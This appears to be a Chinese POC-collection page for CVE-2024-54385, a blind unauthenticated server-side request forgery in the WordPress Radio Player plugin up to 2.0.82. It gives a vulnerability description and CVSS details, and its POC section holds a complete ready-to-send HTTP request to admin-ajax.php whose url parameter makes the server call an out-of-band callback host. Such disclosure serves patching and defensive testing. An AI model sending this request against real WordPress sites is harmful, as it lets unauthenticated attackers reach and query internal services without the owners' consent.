关联漏洞
标题:WordPress plugin Radio Player 代码问题漏洞 (CVE-2024-54385)Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Radio Player 2.0.82版本及之前版本存在代码问题漏洞,该漏洞源于包含一个服务器端请求伪造(SSRF)漏洞。
Description
Radio Player <= 2.0.82 - Blind Unauthenticated Server-Side Request Forgery
介绍
# CVE-2024-54385
Radio Player <= 2.0.82 - Unauthenticated Server-Side Request Forgery
# Description
The Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.0.82. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.
## Details
- **Type**: plugin
- **Slug**: radio-player
- **Affected Version**: 2.0.82
- **CVSS Score**: 7.2
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
- **CVE**: CVE-2024-54385
- **Status**: Active
POC
---
```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8
```
文件快照
[4.0K] /data/pocs/02d07a22babf3f45d8fd10f8e4c9283001f2b2f9
└── [1.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。